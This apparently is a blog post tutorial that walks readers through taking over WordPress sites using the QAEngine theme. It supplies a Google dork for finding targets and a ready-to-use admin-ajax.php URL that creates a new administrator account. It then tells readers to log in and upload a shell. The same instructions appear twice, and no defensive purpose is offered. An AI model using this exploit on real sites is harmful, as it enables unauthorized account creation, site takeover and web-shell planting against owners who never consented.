Hi guys, how you doing ?? Here i come with another easy exploit called "Qaengine"
, Qaengine is admin-ajax exploit which helps in changing admin username and password with just a single click of web url editing,
lets get started with the exploit..
First of all enter google.com paste this following dork: inurl:themes/qaengine Alot of webs will popout on google now select any web and add this exploit
/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
Example www.site.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
You can change the email to your email, Now if the web is vulnrable to our attack immediatly you paste the exploit something will pop up like (admin-ajax.php) just download it, and check the file, if admin details change succesful you'll see something like {"success":false,"msg" with some text, now just login in the admin panel and upload your shell,
incase if you dont uderstand you can still wacth it @ youtube via this link https://m.youtube.com/watch?v=jtwwMSCg0JA&fulldescription=1&hl=en-GB&client=mv-google&gl=NG
, Qaengine is admin-ajax exploit which helps in changing admin username and password with just a single click of web url editing,
lets get started with the exploit..
First of all enter google.com paste this following dork: inurl:themes/qaengine Alot of webs will popout on google now select any web and add this exploit
/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
Example www.site.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=admin11&user_pass=123456&user_email=mdbext@gmail.com&role=administrator
You can change the email to your email, Now if the web is vulnrable to our attack immediatly you paste the exploit something will pop up like (admin-ajax.php) just download it, and check the file, if admin details change succesful you'll see something like {"success":false,"msg" with some text, now just login in the admin panel and upload your shell,
incase if you dont uderstand you can still wacth it @ youtube via this link https://m.youtube.com/watch?v=jtwwMSCg0JA&fulldescription=1&hl=en-GB&client=mv-google&gl=NG
No comments:
Post a Comment